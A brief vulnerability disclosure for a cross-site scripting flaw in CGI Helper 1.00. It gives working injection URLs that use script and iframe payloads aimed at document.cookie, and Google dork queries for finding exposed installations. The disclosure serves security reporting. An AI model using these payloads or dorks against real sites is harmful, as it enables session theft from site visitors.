CGI Helper version 1.00 suffers from a cross site scripting vulnerability.
947c083d30d0cc6d27c6403332bd1b2452721a1bf9387767228b4021aaf2e122
## CGI Helper 1.00 ##
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##
## Discovered by: Paulo Santos ##
## Contact: paulo@infocampoap.com.br ##
## Blog: http://infocampo.wordpress.com ##
The script CGI Helper 1.00 is vulnerable to XSS.
Example:
www.site.com/cgi-bin/helper.cgi
XSS:
www.site.com/cgi-bin/helper.cgi/>><script>alert(document.cookie)</script>
or
Example:
http://www.site.com/cgi-bin/cgihelper.pl
XSS:
http://www.site.com/cgi-bin/cgihelper.pl/>><script>alert(document.cookie)</script>
The script makes infinite iframes that can affect the user:
http://www.site.com/cgi-bin/helper.cgi/>><iframe src=http://www.google.com.br>
or
http://www.site.com/cgi-bin/cgihelper.pl/>><iframe src=http://www.google.com.br>
Google dork:
inurl:cgihelper.pl
inurl:cgi-bin/helper.cgi